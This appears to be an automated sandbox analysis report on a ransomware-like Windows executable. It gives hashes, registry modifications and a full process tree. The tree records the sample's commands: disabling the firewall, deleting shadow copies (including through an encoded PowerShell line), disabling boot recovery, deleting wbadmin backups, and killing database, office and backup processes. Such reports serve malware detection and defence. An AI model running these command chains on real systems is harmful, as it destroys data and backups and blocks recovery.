Analysis
-
max time kernel
62s -
max time network
66s -
platform
windows7_x64 -
resource
win7 -
submitted
22-07-2020 08:54
Static task
static1
Behavioral task
behavioral1
Sample
Deniz_K_z_.bin.exe
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
Deniz_K_z_.bin.exe
Resource
win10
windows10_x64
0 signatures
0 seconds
General
-
Target
Deniz_K_z_.bin.exe
-
Size
3.4MB
-
MD5
fc78e6e58352151fb77a4b92f239d381
-
SHA1
4dda3af9601922394f0c16713180beb2ec88c050
-
SHA256
c8d49d874454bf1fa50cb7e4c00677e028af38e1d22e41476634d5d5a349cd7e
-
SHA512
4df0c69609087abc21be95574b6b09ff12253177a1dfee101ae7e24aa754d494fc837c41cfe636a686b644c9ebe7bf79fe805478ed75ee66a183208f7b3ca489
Score
10/10
Malware Config
Signatures
-
Processes:
Deniz_K_z_.bin.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Deniz_K_z_.bin.exe -
Runs net.exe
-
Modifies service 2 TTPs 9 IoCs
Processes:
netsh.exevssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Shas netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\Qecs netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Enroll\HcsGroups netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\UI netsh.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\NapAgent\LocalConfig netsh.exe -
Disables Task Manager via registry modification
-
Drops file in Drivers directory 1 IoCs
Processes:
Deniz_K_z_.bin.exedescription ioc process File created C:\Windows\System32\drivers\etc\host Deniz_K_z_.bin.exe -
Suspicious use of WriteProcessMemory 236 IoCs
Processes:
Deniz_K_z_.bin.execmd.execmd.execmd.execmd.execmd.exenet.execmd.execmd.exedescription pid process target process PID 824 wrote to memory of 1412 824 Deniz_K_z_.bin.exe cmd.exe PID 824 wrote to memory of 1412 824 Deniz_K_z_.bin.exe cmd.exe PID 824 wrote to memory of 1412 824 Deniz_K_z_.bin.exe cmd.exe PID 824 wrote to memory of 1412 824 Deniz_K_z_.bin.exe cmd.exe PID 824 wrote to memory of 1440 824 Deniz_K_z_.bin.exe cmd.exe PID 824 wrote to memory of 1440 824 Deniz_K_z_.bin.exe cmd.exe PID 824 wrote to memory of 1440 824 Deniz_K_z_.bin.exe cmd.exe PID 824 wrote to memory of 1440 824 Deniz_K_z_.bin.exe cmd.exe PID 824 wrote to memory of 864 824 Deniz_K_z_.bin.exe cmd.exe PID 824 wrote to memory of 864 824 Deniz_K_z_.bin.exe cmd.exe PID 824 wrote to memory of 864 824 Deniz_K_z_.bin.exe cmd.exe PID 824 wrote to memory of 864 824 Deniz_K_z_.bin.exe cmd.exe PID 824 wrote to memory of 796 824 Deniz_K_z_.bin.exe cmd.exe PID 824 wrote to memory of 796 824 Deniz_K_z_.bin.exe cmd.exe PID 824 wrote to memory of 796 824 Deniz_K_z_.bin.exe cmd.exe PID 824 wrote to memory of 796 824 Deniz_K_z_.bin.exe cmd.exe PID 1412 wrote to memory of 360 1412 cmd.exe netsh.exe PID 1412 wrote to memory of 360 1412 cmd.exe netsh.exe PID 1412 wrote to memory of 360 1412 cmd.exe netsh.exe PID 1412 wrote to memory of 360 1412 cmd.exe netsh.exe PID 1440 wrote to memory of 1068 1440 cmd.exe vssadmin.exe PID 1440 wrote to memory of 1068 1440 cmd.exe vssadmin.exe PID 1440 wrote to memory of 1068 1440 cmd.exe vssadmin.exe PID 1440 wrote to memory of 1068 1440 cmd.exe vssadmin.exe PID 864 wrote to memory of 1064 864 cmd.exe vssadmin.exe PID 864 wrote to memory of 1064 864 cmd.exe vssadmin.exe PID 864 wrote to memory of 1064 864 cmd.exe vssadmin.exe PID 864 wrote to memory of 1064 864 cmd.exe vssadmin.exe PID 824 wrote to memory of 1828 824 Deniz_K_z_.bin.exe cmd.exe PID 824 wrote to memory of 1828 824 Deniz_K_z_.bin.exe cmd.exe PID 824 wrote to memory of 1828 824 Deniz_K_z_.bin.exe cmd.exe PID 824 wrote to memory of 1828 824 Deniz_K_z_.bin.exe cmd.exe PID 824 wrote to memory of 1848 824 Deniz_K_z_.bin.exe cmd.exe PID 824 wrote to memory of 1848 824 Deniz_K_z_.bin.exe cmd.exe PID 824 wrote to memory of 1848 824 Deniz_K_z_.bin.exe cmd.exe PID 824 wrote to memory of 1848 824 Deniz_K_z_.bin.exe cmd.exe PID 796 wrote to memory of 1184 796 cmd.exe taskkill.exe PID 796 wrote to memory of 1184 796 cmd.exe taskkill.exe PID 796 wrote to memory of 1184 796 cmd.exe taskkill.exe PID 796 wrote to memory of 1184 796 cmd.exe taskkill.exe PID 824 wrote to memory of 1780 824 Deniz_K_z_.bin.exe cmd.exe PID 824 wrote to memory of 1780 824 Deniz_K_z_.bin.exe cmd.exe PID 824 wrote to memory of 1780 824 Deniz_K_z_.bin.exe cmd.exe PID 824 wrote to memory of 1780 824 Deniz_K_z_.bin.exe cmd.exe PID 1828 wrote to memory of 1764 1828 cmd.exe net.exe PID 1828 wrote to memory of 1764 1828 cmd.exe net.exe PID 1828 wrote to memory of 1764 1828 cmd.exe net.exe PID 1828 wrote to memory of 1764 1828 cmd.exe net.exe PID 1764 wrote to memory of 1620 1764 net.exe net1.exe PID 1764 wrote to memory of 1620 1764 net.exe net1.exe PID 1764 wrote to memory of 1620 1764 net.exe net1.exe PID 1764 wrote to memory of 1620 1764 net.exe net1.exe PID 1848 wrote to memory of 1588 1848 cmd.exe powershell.exe PID 1848 wrote to memory of 1588 1848 cmd.exe powershell.exe PID 1848 wrote to memory of 1588 1848 cmd.exe powershell.exe PID 1848 wrote to memory of 1588 1848 cmd.exe powershell.exe PID 1780 wrote to memory of 1552 1780 cmd.exe vssadmin.exe PID 1780 wrote to memory of 1552 1780 cmd.exe vssadmin.exe PID 1780 wrote to memory of 1552 1780 cmd.exe vssadmin.exe PID 1780 wrote to memory of 1552 1780 cmd.exe vssadmin.exe PID 1828 wrote to memory of 1904 1828 cmd.exe net.exe PID 1828 wrote to memory of 1904 1828 cmd.exe net.exe PID 1828 wrote to memory of 1904 1828 cmd.exe net.exe PID 1828 wrote to memory of 1904 1828 cmd.exe net.exe -
Modifies Windows Firewall 1 TTPs
-
Interacts with shadow copies 2 TTPs 3 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exevssadmin.exepid process 1068 vssadmin.exe 1064 vssadmin.exe 1552 vssadmin.exe -
System policy modification 1 TTPs 17 IoCs
Processes:
Deniz_K_z_.bin.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Deniz_K_z_.bin.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableSecureUIAPaths = "1" Deniz_K_z_.bin.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "1" Deniz_K_z_.bin.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ValidateAdminCodeSignatures = "0" Deniz_K_z_.bin.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableInstallerDetection = "1" Deniz_K_z_.bin.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableUIADesktopToggle = "5" Deniz_K_z_.bin.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken = "0" Deniz_K_z_.bin.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption Deniz_K_z_.bin.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "1" Deniz_K_z_.bin.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\undockwithoutlogon = "1" Deniz_K_z_.bin.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "5" Deniz_K_z_.bin.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\dontdisplaylastusername = "0" Deniz_K_z_.bin.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext Deniz_K_z_.bin.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\scforceoption = "0" Deniz_K_z_.bin.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System Deniz_K_z_.bin.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "3" Deniz_K_z_.bin.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableVirtualization = "1" Deniz_K_z_.bin.exe -
Kills process with taskkill 14 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 1868 taskkill.exe 288 taskkill.exe 1428 taskkill.exe 1992 taskkill.exe 1888 taskkill.exe 1256 taskkill.exe 824 taskkill.exe 1564 taskkill.exe 1064 taskkill.exe 2036 taskkill.exe 2024 taskkill.exe 1184 taskkill.exe 1472 taskkill.exe 108 taskkill.exe -
Suspicious use of AdjustPrivilegeToken 58 IoCs
Processes:
vssvc.exetaskkill.exeWMIC.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exedescription pid process Token: SeBackupPrivilege 1700 vssvc.exe Token: SeRestorePrivilege 1700 vssvc.exe Token: SeAuditPrivilege 1700 vssvc.exe Token: SeDebugPrivilege 1184 taskkill.exe Token: SeIncreaseQuotaPrivilege 1168 WMIC.exe Token: SeSecurityPrivilege 1168 WMIC.exe Token: SeTakeOwnershipPrivilege 1168 WMIC.exe Token: SeLoadDriverPrivilege 1168 WMIC.exe Token: SeSystemProfilePrivilege 1168 WMIC.exe Token: SeSystemtimePrivilege 1168 WMIC.exe Token: SeProfSingleProcessPrivilege 1168 WMIC.exe Token: SeIncBasePriorityPrivilege 1168 WMIC.exe Token: SeCreatePagefilePrivilege 1168 WMIC.exe Token: SeBackupPrivilege 1168 WMIC.exe Token: SeRestorePrivilege 1168 WMIC.exe Token: SeShutdownPrivilege 1168 WMIC.exe Token: SeDebugPrivilege 1168 WMIC.exe Token: SeSystemEnvironmentPrivilege 1168 WMIC.exe Token: SeRemoteShutdownPrivilege 1168 WMIC.exe Token: SeUndockPrivilege 1168 WMIC.exe Token: SeManageVolumePrivilege 1168 WMIC.exe Token: 33 1168 WMIC.exe Token: 34 1168 WMIC.exe Token: 35 1168 WMIC.exe Token: SeDebugPrivilege 108 taskkill.exe Token: SeIncreaseQuotaPrivilege 1168 WMIC.exe Token: SeSecurityPrivilege 1168 WMIC.exe Token: SeTakeOwnershipPrivilege 1168 WMIC.exe Token: SeLoadDriverPrivilege 1168 WMIC.exe Token: SeSystemProfilePrivilege 1168 WMIC.exe Token: SeSystemtimePrivilege 1168 WMIC.exe Token: SeProfSingleProcessPrivilege 1168 WMIC.exe Token: SeIncBasePriorityPrivilege 1168 WMIC.exe Token: SeCreatePagefilePrivilege 1168 WMIC.exe Token: SeBackupPrivilege 1168 WMIC.exe Token: SeRestorePrivilege 1168 WMIC.exe Token: SeShutdownPrivilege 1168 WMIC.exe Token: SeDebugPrivilege 1168 WMIC.exe Token: SeSystemEnvironmentPrivilege 1168 WMIC.exe Token: SeRemoteShutdownPrivilege 1168 WMIC.exe Token: SeUndockPrivilege 1168 WMIC.exe Token: SeManageVolumePrivilege 1168 WMIC.exe Token: 33 1168 WMIC.exe Token: 34 1168 WMIC.exe Token: 35 1168 WMIC.exe Token: SeDebugPrivilege 1064 taskkill.exe Token: SeDebugPrivilege 824 taskkill.exe Token: SeDebugPrivilege 2036 taskkill.exe Token: SeDebugPrivilege 1868 taskkill.exe Token: SeDebugPrivilege 288 taskkill.exe Token: SeDebugPrivilege 1428 taskkill.exe Token: SeDebugPrivilege 1588 powershell.exe Token: SeDebugPrivilege 2024 taskkill.exe Token: SeDebugPrivilege 1472 taskkill.exe Token: SeDebugPrivilege 1992 taskkill.exe Token: SeDebugPrivilege 1888 taskkill.exe Token: SeDebugPrivilege 1256 taskkill.exe Token: SeDebugPrivilege 1564 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 1588 powershell.exe 1588 powershell.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Deniz_K_z_.bin.exe"C:\Users\Admin\AppData\Local\Temp\Deniz_K_z_.bin.exe"1⤵
- Checks whether UAC is enabled
- Drops file in Drivers directory
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C netsh firewall set opmode disable2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode disable3⤵
- Modifies service
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\vssadmin.exevssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB3⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\vssadmin.exevssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded3⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C taskkill /f /im sql.* & taskkill /f /im winword.* & taskkill /f /im wordpad.* & taskkill /f /im outlook.* & taskkill /f /im thunderbird.* & taskkill /f /im oracle.* & taskkill /f /im excel.* & taskkill /f /im onenote.* & taskkill /f /im virtualboxvm.* & taskkill /f /im node.* & taskkill /f /im QBW32.* & taskkill /f /im WBGX.* & taskkill /f /im Teams.* & taskkill /f /im Flow.*2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sql.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im winword.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im wordpad.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im outlook.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im thunderbird.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im oracle.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im excel.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im onenote.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im virtualboxvm.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im node.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im QBW32.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im WBGX.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Teams.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Flow.*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C net stop DbxSvc & net stop OracleXETNSListener & net stop OracleServiceXE & net stop AcrSch2Svc & net stop AcronisAgent & net stop Apache2.4 & net stop SQLWriter & net stop MSSQL$SQLEXPRESS & net stop MSSQLServerADHelper100 & net stop MongoDB & net stop SQLAgent$SQLEXPRESS & net stop SQLBrowser & net stop CobianBackup11 & net stop cbVSCService11 & net stop QBCFMontorService & net stop QBVSS2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop DbxSvc3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DbxSvc4⤵
-
C:\Windows\SysWOW64\net.exenet stop OracleXETNSListener3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop OracleXETNSListener4⤵
-
C:\Windows\SysWOW64\net.exenet stop OracleServiceXE3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop OracleServiceXE4⤵
-
C:\Windows\SysWOW64\net.exenet stop AcrSch2Svc3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc4⤵
-
C:\Windows\SysWOW64\net.exenet stop AcronisAgent3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcronisAgent4⤵
-
C:\Windows\SysWOW64\net.exenet stop Apache2.43⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Apache2.44⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLWriter3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLWriter4⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$SQLEXPRESS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS4⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQLServerADHelper1003⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper1004⤵
-
C:\Windows\SysWOW64\net.exenet stop MongoDB3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MongoDB4⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent$SQLEXPRESS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS4⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLBrowser3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLBrowser4⤵
-
C:\Windows\SysWOW64\net.exenet stop CobianBackup113⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CobianBackup114⤵
-
C:\Windows\SysWOW64\net.exenet stop cbVSCService113⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop cbVSCService114⤵
-
C:\Windows\SysWOW64\net.exenet stop QBCFMontorService3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBCFMontorService4⤵
-
C:\Windows\SysWOW64\net.exenet stop QBVSS3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBVSS4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wbadmin delete systemstatebackup & wbadmin delete systemstatebackup -keepversions:0 & wbadmin delete backup2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/108-23-0x0000000000000000-mapping.dmp
-
memory/288-48-0x0000000000000000-mapping.dmp
-
memory/360-4-0x0000000000000000-mapping.dmp
-
memory/792-53-0x0000000000000000-mapping.dmp
-
memory/796-3-0x0000000000000000-mapping.dmp
-
memory/824-33-0x0000000000000000-mapping.dmp
-
memory/828-20-0x0000000000000000-mapping.dmp
-
memory/864-2-0x0000000000000000-mapping.dmp
-
memory/1044-46-0x0000000000000000-mapping.dmp
-
memory/1064-6-0x0000000000000000-mapping.dmp
-
memory/1064-28-0x0000000000000000-mapping.dmp
-
memory/1068-5-0x0000000000000000-mapping.dmp
-
memory/1072-24-0x0000000000000000-mapping.dmp
-
memory/1080-39-0x0000000000000000-mapping.dmp
-
memory/1168-19-0x0000000000000000-mapping.dmp
-
memory/1184-9-0x0000000000000000-mapping.dmp
-
memory/1256-59-0x0000000000000000-mapping.dmp
-
memory/1300-32-0x0000000000000000-mapping.dmp
-
memory/1412-0-0x0000000000000000-mapping.dmp
-
memory/1428-51-0x0000000000000000-mapping.dmp
-
memory/1440-1-0x0000000000000000-mapping.dmp
-
memory/1472-56-0x0000000000000000-mapping.dmp
-
memory/1492-22-0x0000000000000000-mapping.dmp
-
memory/1528-47-0x0000000000000000-mapping.dmp
-
memory/1544-54-0x0000000000000000-mapping.dmp
-
memory/1552-14-0x0000000000000000-mapping.dmp
-
memory/1560-42-0x0000000000000000-mapping.dmp
-
memory/1564-60-0x0000000000000000-mapping.dmp
-
memory/1576-45-0x0000000000000000-mapping.dmp
-
memory/1588-13-0x0000000000000000-mapping.dmp
-
memory/1596-29-0x0000000000000000-mapping.dmp
-
memory/1596-50-0x0000000000000000-mapping.dmp
-
memory/1608-43-0x0000000000000000-mapping.dmp
-
memory/1620-12-0x0000000000000000-mapping.dmp
-
memory/1644-27-0x0000000000000000-mapping.dmp
-
memory/1648-41-0x0000000000000000-mapping.dmp
-
memory/1764-11-0x0000000000000000-mapping.dmp
-
memory/1764-30-0x0000000000000000-mapping.dmp
-
memory/1772-49-0x0000000000000000-mapping.dmp
-
memory/1776-26-0x0000000000000000-mapping.dmp
-
memory/1780-10-0x0000000000000000-mapping.dmp
-
memory/1828-7-0x0000000000000000-mapping.dmp
-
memory/1840-25-0x0000000000000000-mapping.dmp
-
memory/1848-8-0x0000000000000000-mapping.dmp
-
memory/1868-44-0x0000000000000000-mapping.dmp
-
memory/1888-58-0x0000000000000000-mapping.dmp
-
memory/1892-34-0x0000000000000000-mapping.dmp
-
memory/1896-36-0x0000000000000000-mapping.dmp
-
memory/1904-15-0x0000000000000000-mapping.dmp
-
memory/1916-16-0x0000000000000000-mapping.dmp
-
memory/1940-52-0x0000000000000000-mapping.dmp
-
memory/1948-35-0x0000000000000000-mapping.dmp
-
memory/1964-37-0x0000000000000000-mapping.dmp
-
memory/1972-18-0x0000000000000000-mapping.dmp
-
memory/1992-17-0x0000000000000000-mapping.dmp
-
memory/1992-57-0x0000000000000000-mapping.dmp
-
memory/2024-55-0x0000000000000000-mapping.dmp
-
memory/2036-40-0x0000000000000000-mapping.dmp
-
memory/2040-21-0x0000000000000000-mapping.dmp